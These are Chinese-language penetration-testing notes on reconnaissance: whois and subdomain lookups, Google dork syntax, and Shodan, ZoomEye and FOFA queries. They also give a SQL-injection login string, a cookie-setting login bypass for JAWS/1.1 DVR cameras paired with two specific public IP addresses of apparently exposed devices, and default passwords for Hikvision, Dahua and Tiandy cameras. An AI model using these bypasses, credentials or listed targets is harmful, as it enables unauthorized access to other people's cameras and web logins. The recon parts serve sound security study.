1、收集内容
DNS信息:域名注册商、管理员联系方式、电话、邮箱、子域名
1、whois kali工具
2、whois.chinaz.com 站长之家 子域名查询
1、searchdns.netcraft.com
2、证书 判断对方操作系统 windows还是linux,是否大小写 搜索引擎
google hacking google--机器人、hacking---搜索引擎语法
site --- 指定网站 "" --- 包含关键字 inurl --- 在url中出现的关键字 filetype --- 搜索文件类型 探索网站目录结构 "parent directory" site:testfire.net 搜索容易存在sql 注入的页面 site:testfire.net inurl:login 搜索指定的文件类型 filetype pdf 搜索phpinfo() intext:"PHP Version" exit:php intest:"disabled" intext:"BuildDate" intext:"Syatem" intext:"allow_url_fopen" 搜索phpstudy 搜索php 探针 intitle:"php中文网 探针2014"
空间搜索引擎
https://www.zoomeye.org/ https://fofa.so/ https://www.shodan.io/
ZoomEye 支持公网设备指纹检索和Web 指纹检索。网站指纹包括应用名、版本、前端框架、后端框架、服务端语言、服务器操作系统、网站容器、内容管理系统和数据等。
搜索iis6.0 组件
app:"Microsoft IIS httpd" ver:"6.0"
搜索开启3389 端口的windows 主机
port:3389 OS:windows
万能登录密码 [admin/123456' or '1'='1]
利用shodan 搜索 JAWS/1.1 ---某一款CCTV摄像头漏洞 空口令登录 http://200.118.68.42:60001/view2.html 登录绕过---代码绕过--- http://79.20.218.102 F12控制台---allow pasting document.cookie="dvr_camcnt=4"; document.cookie="dvr_usr=admin"; document.cookie="dvr_pwd=123"; 回车 然后在网址后加上/view2.html
其他摄像头
海康威视IP网络摄像机admin,密码12345
Hiskvision
Server:DVRDVS-Webs
大华网络摄像头admin,密码:888888
天地伟业网络摄像机Admin,密码:111111
web服务器信息收集
火狐插件
netcraft插件
https://sitereport.netcraft.com/?url=http://testfire.net 查看网站详细信息
wappalyzar插件